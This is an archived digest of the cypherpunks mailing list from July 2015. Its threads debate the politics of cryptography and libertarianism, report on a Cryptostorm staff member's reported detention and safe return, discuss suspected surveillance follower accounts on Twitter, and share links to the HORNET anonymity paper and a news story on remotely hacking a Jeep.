Jul 22 15:03:24 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 19:03:24 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: <55b012da.940f370a.9e74.ffff8a97@mx.google.com> On Tue, 21 Jul 2015 20:49:31 -0700 Seth wrote: > http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html > > > > > Almost all cypherpunks were anarchists who regarded the state as the > enemy. Most but not all were anarchists of the Right, or in American > parlance, libertarians, who supported laissez-faire capitalism. That's for the people who didn't get the memo. (Oops. I just picked up the expression from Zenaan. I hope he doesn't sue me) Now, here's another important memo : Firms like gaagle, bank of amerikkka, amerikkka online, etc, are textbook examples of corporatism, mercantilism and, given their support for the american fascist state, they can be classed as outright fascist. (American) big businesses have NOTHING to do with "free market capitalism". Interestingly enough both anti-libertarians and fake libertarians like to pretend that big fascist businesses are justified by libertarian philosophy. > The cypherpunks formed a house of many rooms. The only > thing they all shared was an understanding of the political > significance of cryptography and the willingness to fight for privacy > and unfettered freedom in cyberspace. A flawed understanding it seems. > > From admin at pilobilus.net Wed Jul 22 16:19:38 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 22 Jul 2015 19:19:38 -0400 Subject: an ominous comment In-Reply-To: <55b012da.940f370a.9e74.ffff8a97@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> Message-ID: <55B0250A.4040000@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/22/2015 06:03 PM, Juan wrote: >> The cypherpunks formed a house of many rooms. The only thing >> they all shared was an understanding of the political >> significance of cryptography and the willingness to fight for >> privacy and unfettered freedom in cyberspace. > > A flawed understanding it seems. Oi, group identity in any anarchist-friendly venue can't be enforced by any kind of coercive authority, else it is not an anarchist-friendly venue. Fighting over the definition of the group is only fun until somebody wins. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVsCUIAAoJEDZ0Gg87KR0LKI4P/RU1tIiSfwJ+nYYHPGqCFocE xXtLswzXeyoXxOX5cc621lKHa0F6NbRG/ZXO7aqVtbeWpF/A2wjAf5rprUGSEzv7 nm7exyhXrSrMvYkjx+9BlxduvbOSQJAsfCwCeKa9SOoXcg0yOFolSssaPSzHHBP8 w9+7mDT+jAWzuyuqpfk+8Ntk3E7tfPtOEiWBPKB0Um1k7ySklWVk1mPiPCgmrBEM dCgFZ+JxuqHrLaZSYcvLVMAyxlmpYWZAk9Y9KkZ45Kir5uRb/Ezy4IUXnUso89et ErH9FqdmV6BEun1okoce2eflXfHkLGhFcPcXOeDqUZK8wxP/RE8Du6BFBUHf+XeJ GS1F6rUBvJjyQZm1Vpwlh2RrJV7xtOo98oTRR9b8/3yDOl42tN7pDXtauMChE3Lt Nw4WnTDU1Fzasxwq5fJsK+sA0m91PQken0csu+NG0Nqc8U6HgCp0EoqzrxUyPF0Z m3fiqL0Bq4A8O0wbQVe+d1riCk8lnVMW9svEP8bi2w6IPqJJ9lhFSVlA6T26/HFi OhecuDHIogAMPf4tfTrTfewoCmfBvVA2NvH+gqnzr9DQTgby8WzLQ1y/aANlgBI9 01/jrZSJoWaOgh0ojqJ4QoSXl9TS5kQ17PirGwfFD9+bXaFHqNXIv2loWrA2/OnA 2TmJ2zgxgwooh/RI5gIR =+zOF -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 22 16:33:33 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 20:33:33 -0300 Subject: an ominous comment In-Reply-To: <55B0250A.4040000@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> <55B0250A.4040000@pilobilus.net> Message-ID: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> On Wed, 22 Jul 2015 19:19:38 -0400 Steve Kinney wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/22/2015 06:03 PM, Juan wrote: > > >> The cypherpunks formed a house of many rooms. The only thing > >> they all shared was an understanding of the political > >> significance of cryptography and the willingness to fight for > >> privacy and unfettered freedom in cyberspace. > > > > A flawed understanding it seems. > > Oi, group identity in any anarchist-friendly venue can't be > enforced by any kind of coercive authority, else it is not an > anarchist-friendly venue. Fighting over the definition of the > group is only fun until somebody wins. Apologies, my last remark wasn't too clear. "understanding of the political significance of cryptography" What I meant is that cypherpunks seem to put too much emphasis on the political benefits and 'significance' of crypto when in reality crypto doesn't really solve politicals problems. > > :o) > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1 > > iQIcBAEBAgAGBQJVsCUIAAoJEDZ0Gg87KR0LKI4P/RU1tIiSfwJ+nYYHPGqCFocE > xXtLswzXeyoXxOX5cc621lKHa0F6NbRG/ZXO7aqVtbeWpF/A2wjAf5rprUGSEzv7 > nm7exyhXrSrMvYkjx+9BlxduvbOSQJAsfCwCeKa9SOoXcg0yOFolSssaPSzHHBP8 > w9+7mDT+jAWzuyuqpfk+8Ntk3E7tfPtOEiWBPKB0Um1k7ySklWVk1mPiPCgmrBEM > dCgFZ+JxuqHrLaZSYcvLVMAyxlmpYWZAk9Y9KkZ45Kir5uRb/Ezy4IUXnUso89et > ErH9FqdmV6BEun1okoce2eflXfHkLGhFcPcXOeDqUZK8wxP/RE8Du6BFBUHf+XeJ > GS1F6rUBvJjyQZm1Vpwlh2RrJV7xtOo98oTRR9b8/3yDOl42tN7pDXtauMChE3Lt > Nw4WnTDU1Fzasxwq5fJsK+sA0m91PQken0csu+NG0Nqc8U6HgCp0EoqzrxUyPF0Z > m3fiqL0Bq4A8O0wbQVe+d1riCk8lnVMW9svEP8bi2w6IPqJJ9lhFSVlA6T26/HFi > OhecuDHIogAMPf4tfTrTfewoCmfBvVA2NvH+gqnzr9DQTgby8WzLQ1y/aANlgBI9 > 01/jrZSJoWaOgh0ojqJ4QoSXl9TS5kQ17PirGwfFD9+bXaFHqNXIv2loWrA2/OnA > 2TmJ2zgxgwooh/RI5gIR > =+zOF > -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 22 17:24:07 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 21:24:07 -0300 Subject: an ominous comment In-Reply-To: <55B0250A.4040000@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> <55B0250A.4040000@pilobilus.net> Message-ID: <55b033d7.4e2b370a.c84ab.ffff9d27@mx.google.com> " 1.5.1. "Why is this FAQ not in Mosaic form?" - because the author (tcmay, as of 7/94) does not have Mosaic access," From juan.g71 at gmail.com Wed Jul 22 17:57:50 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 21:57:50 -0300 Subject: an ominous comment In-Reply-To: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> Message-ID: <55b03bbf.64538c0a.771e.ffff9df0@mx.google.com> On Thu, 23 Jul 2015 00:13:50 +0000 (UTC) jim bell : > >   What I meant is that cypherpunks seem to put too much > >   emphasis on the political benefits and 'significance' of > >   crypto when in reality crypto doesn't really solve political > >    problems. > > > Not yet, anyway.        Jim Bell I wish I shared your optimism(?) Jim, but I'm a tad skeptical at the moment. Cheers ;) >         > > > > From odinn.cyberguerrilla at riseup.net Wed Jul 22 22:14:28 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 22 Jul 2015 22:14:28 -0700 Subject: Message of Concern re. CSIS action sent from Cryptostorm Message-ID: <55B07834.1000605@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, A tweet was sent out from Cryptostorm concerning one of their staff who was apparently taken away by the CSIS: https://twitter.com/cryptostorm_is/status/624070397219180544 The text of the tweet: "Core cryptostorm team member @grazestorm is currently held hostage by rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT broadly." The tweet was timestamped 9:15 PM - 22 Jul 2015 For reference, the CSIS is the Canadian Security Intelligence Service. Please keep eyes on @cryptostorm_is twitter feed and provide them with moral and any other support you deem appropriate. Cryptostorm are good people. - -O - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVsHgzAAoJEGxwq/inSG8CCZYH/1g2n2d+Magp+N1zn41oMhOo UU//rIsLkx3Erjbdy1Q8k78vg5MePmOqX6DrvrIKpj+Uai6QSefVYhbwQU0inJ7w rcR6I7Sq7twSxc9vHUOOGLnshf4bVaKsjL4Q0PUneFNdF93EOAUUx/+0lIe4AcxK PZU51ZOsXaTBej6oi+MSLEQWCZ5RqBi8SKCeNVP7nQ6g75+zW/8MRQ1mHwJ3xz4/ 9I+vb2EwSJ/tI2A0OajTxyxezuOCzutBZyVQ5q5T04+IXvtFt/1TVNlQGAji4cA4 +DrSKfhnWbcFOTqDX35OckL1SGQCF8IgaisgVWxAsS3vcmXQVHqb9mMm0KHiGGk= =P2S0 -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 22 18:27:10 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 22:27:10 -0300 Subject: interwebs trivia Message-ID: <55b0429d.8def8c0a.4a227.ffff9f41@mx.google.com> "2.13.1. "What is Crypto Anarchy?" - Some of us believe various forms of strong cryptography will cause the power of the state to decline, perhaps even collapse fairly abruptly. We believe the expansion into cyberspace, with secure communications, digital money, anonymity and pseudonymity, and other crypto-mediated interactions, will profoundly change the nature of economies and social interactions." TM ----------------------- "The world is not sliding, but galloping into a new transnational dystopia. This development has not been properly recognized outside of national security circles. It has been hidden by secrecy, complexity and scale. The internet, our greatest tool of emancipation, has been transformed into the most dangerous facilitator of totalitarianism we have ever seen. The internet is a threat to human civilization." JA From rich at openwatch.net Wed Jul 22 22:49:29 2015 From: rich at openwatch.net (Rich Jones) Date: Wed, 22 Jul 2015 22:49:29 -0700 Subject: HORNET: High-speed Onion Routing at the Network Layer Message-ID: No PoC published yet, but interesting work on a new high speed router based anonymity network. "We present HORNET, a system that enables high-speed end-to-end anonymous channels by leveraging next generation network archi-tectures. HORNET is designed as a low-latency onion routing system that operates at the network layer thus enabling a wide ra nge of applications. Our system uses only symmetric cryptography for data forwarding yet requires no per-flow state on intermediate nodes. This design enables HORNET nodes to process anonymous traffic at over 93 Gb/s. HORNET can also scale as required, adding minimal processing overhead per additional anonymous channel. We discuss design and implementation details, as well as a performance and security evaluation." http://arxiv.org/pdf/1507.05724v1.pdf Another subtle but slightly interesting tweak to the threat model in post-Snowden anonymity papers - increased difficultly of upholding a global political conspiracy is now explicitly mentioned as layer of defense (7.3). R -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1465 bytes Desc: not available URL: From rysiek at hackerspace.pl Wed Jul 22 15:01:34 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 23 Jul 2015 00:01:34 +0200 Subject: In-Reply-To: <55AFCBE2.9010500@riseup.net> References: <55AFCBE2.9010500@riseup.net> Message-ID: <14379325.OXAP0zpybx@lapuntu> Dnia środa, 22 lipca 2015 09:59:14 Razer pisze: > My 'follow-stalkers' are typically 'girls' posting various types of pron > interspersed with tweets about a variety of subjects where I inevitably > end up seeing the same tweets across the various accounts. Many of the > links posted, when not to pron sites go to 'humorous photo gallery' > sites, of which most seem to be hosted by... Wait for it, Cloudflare. This seems like something that might be worth documenting and datamining, maybe? -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From jdb10987 at yahoo.com Wed Jul 22 17:13:50 2015 From: jdb10987 at yahoo.com (jim bell) Date: Thu, 23 Jul 2015 00:13:50 +0000 (UTC) Subject: an ominous comment In-Reply-To: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> Message-ID: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> From: Juan On Wed, 22 Jul 2015 19:19:38 -0400 Steve Kinney wrote: >> On 07/22/2015 06:03 PM, Juan wrote: >> >> >> The cypherpunks formed a house of many rooms. The only thing >> >> they all shared was an understanding of the political > >> significance of cryptography and the willingness to fight for >> >> privacy and unfettered freedom in cyberspace. > >> > >> A flawed understanding it seems. > >> Oi, group identity in any anarchist-friendly venue can't be >> enforced by any kind of coercive authority, else it is not an >> anarchist-friendly venue.  Fighting over the definition of the >> group is only fun until somebody wins. >   What I meant is that cypherpunks seem to put too much >   emphasis on the political benefits and 'significance' of >   crypto when in reality crypto doesn't really solve political >    problems. Not yet, anyway.        Jim Bell         -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2611 bytes Desc: not available URL: From rysiek at hackerspace.pl Wed Jul 22 17:01:57 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 23 Jul 2015 02:01:57 +0200 Subject: an ominous comment In-Reply-To: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <55B0250A.4040000@pilobilus.net> <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> Message-ID: <4158242.f1PXDUlRlp@lapuntu> Dnia środa, 22 lipca 2015 20:33:33 Juan pisze: > On Wed, 22 Jul 2015 19:19:38 -0400 > > Steve Kinney wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > On 07/22/2015 06:03 PM, Juan wrote: > > >> The cypherpunks formed a house of many rooms. The only thing > > >> they all shared was an understanding of the political > > >> significance of cryptography and the willingness to fight for > > >> privacy and unfettered freedom in cyberspace. > > > > > > A flawed understanding it seems. > > > > Oi, group identity in any anarchist-friendly venue can't be > > enforced by any kind of coercive authority, else it is not an > > anarchist-friendly venue. Fighting over the definition of the > > group is only fun until somebody wins. > > Apologies, my last remark wasn't too clear. > > > "understanding of the political significance of cryptography" > > What I meant is that cypherpunks seem to put too much > emphasis on the political benefits and 'significance' of > crypto when in reality crypto doesn't really solve politicals > problems. There is a world of difference between "A is politically significant" and "A solves political problems". Try religion. Religion is absurdly politically significant, but I wager we can all agree it doesn't really *solve* political problems. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From oshwm at openmailbox.org Thu Jul 23 00:45:00 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 23 Jul 2015 08:45:00 +0100 Subject: Message of Concern re. CSIS action sent from Cryptostorm In-Reply-To: <55B07834.1000605@riseup.net> References: <55B07834.1000605@riseup.net> Message-ID: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> He's back online now, some explaining from cryptostorm soon I hope :) On 23 July 2015 06:14:28 BST, odinn wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >Hello, > >A tweet was sent out from Cryptostorm concerning one of their staff >who was apparently taken away by the CSIS: > >https://twitter.com/cryptostorm_is/status/624070397219180544 > >The text of the tweet: > >"Core cryptostorm team member @grazestorm is currently held hostage by >rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT broadly." > >The tweet was timestamped 9:15 PM - 22 Jul 2015 > >For reference, the CSIS is the Canadian Security Intelligence Service. > >Please keep eyes on @cryptostorm_is twitter feed and provide them with >moral and any other support you deem appropriate. Cryptostorm are >good people. > >- -O > >- -- >http://abis.io ~ >"a protocol concept to enable decentralization >and expansion of a giving economy, and a new social good" >https://keybase.io/odinn >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1 > >iQEcBAEBAgAGBQJVsHgzAAoJEGxwq/inSG8CCZYH/1g2n2d+Magp+N1zn41oMhOo >UU//rIsLkx3Erjbdy1Q8k78vg5MePmOqX6DrvrIKpj+Uai6QSefVYhbwQU0inJ7w >rcR6I7Sq7twSxc9vHUOOGLnshf4bVaKsjL4Q0PUneFNdF93EOAUUx/+0lIe4AcxK >PZU51ZOsXaTBej6oi+MSLEQWCZ5RqBi8SKCeNVP7nQ6g75+zW/8MRQ1mHwJ3xz4/ >9I+vb2EwSJ/tI2A0OajTxyxezuOCzutBZyVQ5q5T04+IXvtFt/1TVNlQGAji4cA4 >+DrSKfhnWbcFOTqDX35OckL1SGQCF8IgaisgVWxAsS3vcmXQVHqb9mMm0KHiGGk= >=P2S0 >-----END PGP SIGNATURE----- From Rayzer at riseup.net Thu Jul 23 10:29:34 2015 From: Rayzer at riseup.net (Razer) Date: Thu, 23 Jul 2015 10:29:34 -0700 Subject: In-Reply-To: <14379325.OXAP0zpybx@lapuntu> References: <55AFCBE2.9010500@riseup.net> <14379325.OXAP0zpybx@lapuntu> Message-ID: <55B1247E.7040305@riseup.net> On 07/22/2015 03:01 PM, rysiek wrote: > Dnia środa, 22 lipca 2015 09:59:14 Razer pisze: >> My 'follow-stalkers' are typically 'girls' posting various types of pron >> interspersed with tweets about a variety of subjects where I inevitably >> end up seeing the same tweets across the various accounts. Many of the >> links posted, when not to pron sites go to 'humorous photo gallery' >> sites, of which most seem to be hosted by... Wait for it, Cloudflare. > This seems like something that might be worth documenting and datamining, > maybe? > I've thought about doing a more thorough correlation study. For all I know there are clues in it about the originators. For example. Some of the corelated tweets across accounts contained (anatomical) 'colon problem' tweets. Suppose some NSA analyst somewhere has "Irritable Bowel Syndrome", and they're telegraphing it subconsciously in their choice of tweets? RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From oshwm at openmailbox.org Thu Jul 23 02:42:28 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 23 Jul 2015 10:42:28 +0100 Subject: Message of Concern re. CSIS action sent from Cryptostorm In-Reply-To: <2145836.D1Zn44RHbJ@lapuntu> References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> <2145836.D1Zn44RHbJ@lapuntu> Message-ID: <0E85854D-F000-4A63-9752-283A9F84F024@openmailbox.org> Cryptostorm official Twitter account has acknowledged that Grazestorm is safe and well. It appears to be some sort of internal misunderstanding which Cryptostorm say they'll possibly publish details about via their forums when they've worked out the details. cheers, oshwm. On 23 July 2015 09:43:47 BST, rysiek wrote: >Dnia czwartek, 23 lipca 2015 08:45:00 oshwm pisze: >> He's back online now, some explaining from cryptostorm soon I hope :) > >Keeping the non-twittering among us up to date on this would be highly >appreciated. :) From rysiek at hackerspace.pl Thu Jul 23 01:43:47 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 23 Jul 2015 10:43:47 +0200 Subject: Message of Concern re. CSIS action sent from Cryptostorm In-Reply-To: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> Message-ID: <2145836.D1Zn44RHbJ@lapuntu> Dnia czwartek, 23 lipca 2015 08:45:00 oshwm pisze: > He's back online now, some explaining from cryptostorm soon I hope :) Keeping the non-twittering among us up to date on this would be highly appreciated. :) -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From drwho at virtadpt.net Thu Jul 23 10:46:08 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 23 Jul 2015 10:46:08 -0700 Subject: In-Reply-To: <14379325.OXAP0zpybx@lapuntu> References: <55AFCBE2.9010500@riseup.net> <14379325.OXAP0zpybx@lapuntu> Message-ID: <55B12860.2060601@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 03:01 PM, rysiek wrote: > This seems like something that might be worth documenting and > datamining, maybe? Somebody seems to be keeping an eye on this mailing list - I just had to ban a half-dozen that followed me within about a five minute span. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ One if by land, two if by sea, three if by interdimensional teleportation. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVsShaAAoJED1np1pUQ8RklLEP/1owvypGmh3gWaVcdPl84ewI k1+GJsUsaqW47gkN7lk6uCg/HFsnq0UJimm+3AQfqcbO8SeSIPY19U7A2lgzD26k SXBrLb7w1h1+zWDvlX89LI3VBw5jYfYP/6mV+sLq0PuA0heMVilkOrrdqxq04gg1 xBt+MEI0mJ0B0cQ5Xr0RcUAfARYsFNzmqnRVvfycjOKXfKbNdXx7skfy2Mf9mD5A F8K15H7yCQ38oiUF3rnBNzrX/JmNyvqIXC+fpqKAHGmtXMxW2IIHYWaxzle/OQ36 HL59T/uhQpcYL+KYl3QI1UkzwQ3EpNlibNbNMMgSCPLjOhtPfbPBYcXyE7UKtXx3 f55VnqDewkqx+nYIm6unsx/qByzm1K2+Hqk3JXF0icvk+n6P/b0oRBZVZZvFrBKF ohtTU/dPZ8hq48uOdApHSrwFoiUV5ozbatMaYFNGNNuLzOuSHGcUhNqML3s7V+Uu /z2vLXkBEJYinTifk6TmCcyTKlSOSgfg4oGKpVoICZp1Vhu/lTqeWIEuRFxTo5J4 i/YGtFcsm1wmfhd4X846xJCNcUdv+O5HF6biYGFuL5IpKNr+Q3bELJ+oDPgRFr8j D0zl7bseXAk1VjbrfyQaloWfhM/VA9uOBKx7l3dFFhegvQZif5FzJROCZkg6e9DW uF0ZdsQE7pKQKvqCIG1T =RveM -----END PGP SIGNATURE----- From drwho at virtadpt.net Thu Jul 23 10:49:30 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 23 Jul 2015 10:49:30 -0700 Subject: Message of Concern re. CSIS action sent from Cryptostorm In-Reply-To: <2145836.D1Zn44RHbJ@lapuntu> References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> <2145836.D1Zn44RHbJ@lapuntu> Message-ID: <55B1292A.6060102@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/23/2015 01:43 AM, rysiek wrote: > Keeping the non-twittering among us up to date on this would be > highly appreciated. :) https://twitter.com/cryptostorm_is/status/624126386601611264 It is happy news indeed to report @grazestorm is safe; underlying circumstances being clarified, & steps taken to prevent future attempts. https://twitter.com/cryptostorm_is/status/624126912399548417 We shall post additional details - via @keybase signed essay - in forum once the dust has observably settled, legitimately, in this matter. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ One if by land, two if by sea, three if by interdimensional teleportation. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVsSkpAAoJED1np1pUQ8RkbMoP/0+qN7SRFszvaSqMeQuSeZjY NpmeR+3/+4gpv0z5U38nmKpojKEgRlgg3xYRE5AY78tzh1e6gI8GDcnNpayvEKQa lDLumZQEXNeS+bKoqq9VIa6nEYidYfiGoorsU36lw1Rmq5BTRL3wGlYDdgm5KqGA jjz8ZIgKW50gCcfltaxnmKO5wgqNgYDjDtFEUu/o517IsNeaWWzWTuBcoSOAfsUi UF2jXdPnh8HRGMLXAHx5M8nIHiLiQ4qmd6pMMXx4gpgrvg1h0v32s0QkMWFS1Bax drroDPrCNDE8BCjbXCeh1yRl48faMMmwT/qbXBoDlVL9eWPmUoaHfQ9V45RoxY7N o/5oeo/yzM2AjlWcNTGPs9F6zJwb8uc/pYugcS2t3nsKD2wZKjGxahwm8PFCNAUj M4liFm5BM3LmapiBmemxl0uWsB8i6Zkjl9xrizSret922WHSbstrH1bUbTqJi0lw l57947t42cXTDMZFmMQvrVYepC6zDTZFU4o8s2t2GAwM8a7ypiT4rRzzzXd8cpFy 0mjIkPaYTf0VsL7fBe3nwhX92wnxPnrd6ODCkVmirkjnts8D0h5jINdy5YP9lgKk dvd0fwvUMEYWkx3GrTvJ+x2ucRlUzf47OSe4NYQESKnYcBjEe9zxAkp+ZLxkQF8W c5yrIzVwnhTYV6rYh0jc =vq/y -----END PGP SIGNATURE----- From dan at geer.org Thu Jul 23 21:37:58 2015 From: dan at geer.org (dan at geer.org) Date: Fri, 24 Jul 2015 00:37:58 -0400 Subject: an ominous comment In-Reply-To: Your message of "Wed, 22 Jul 2015 10:16:09 +1000." <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> Message-ID: <20150724043758.70036228118@palinka.tinho.net> | It's funny how so many patriots love the country they happened to have | been born in. http://ebooks.library.cornell.edu/cgi/t/text/pageviewer-idx?c=atla;cc=atla;rgn=full%20text;idno=atla0012-5;didno=atla0012-5;view=image;seq=0671;node=atla0012-5%3A1 ymmv, --dan From grarpamp at gmail.com Thu Jul 23 23:05:06 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 24 Jul 2015 02:05:06 -0400 Subject: an ominous comment In-Reply-To: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Wed, Jul 22, 2015 at 8:13 PM, jim bell wrote: >> What I meant is that cypherpunks seem to put too much >> emphasis on the political benefits and 'significance' of >> crypto when in reality crypto doesn't really solve political >> problems. > > Not yet, anyway. What examples in history are there of long strings of (say five or more) targeted knockoffs of assorted high level types (be they among Govt or Corp)? Analysis of the leadup situation surrounding those may be predictor for the next. And may indicate whether money was sole, primary, simply grease, or no relation. And if related were they single, group, or crowd funded. From shelley at misanthropia.org Fri Jul 24 05:53:55 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 05:53:55 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> Message-ID: <20150724125338.94C53C00017@frontend1.nyi.internal> On July 24, 2015 5:25:18 AM Peter Gutmann wrote: > Georgi Guninski writes: > > >http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ > > > >I was driving 70 mph on the edge of downtown St. Louis when the exploit > >began to take hold. > . > I remember saying something like "I feel a bit lightheaded; maybe you should > drive..." And suddenly there was a terrible roar all around us and the sky was > full of what looked like huge bats, all swooping and screeching and diving > around the car, which was going about a hundred miles an hour with the top > down. And a voice was screaming: "Holy Jesus! What are these goddamn > animals?" > > 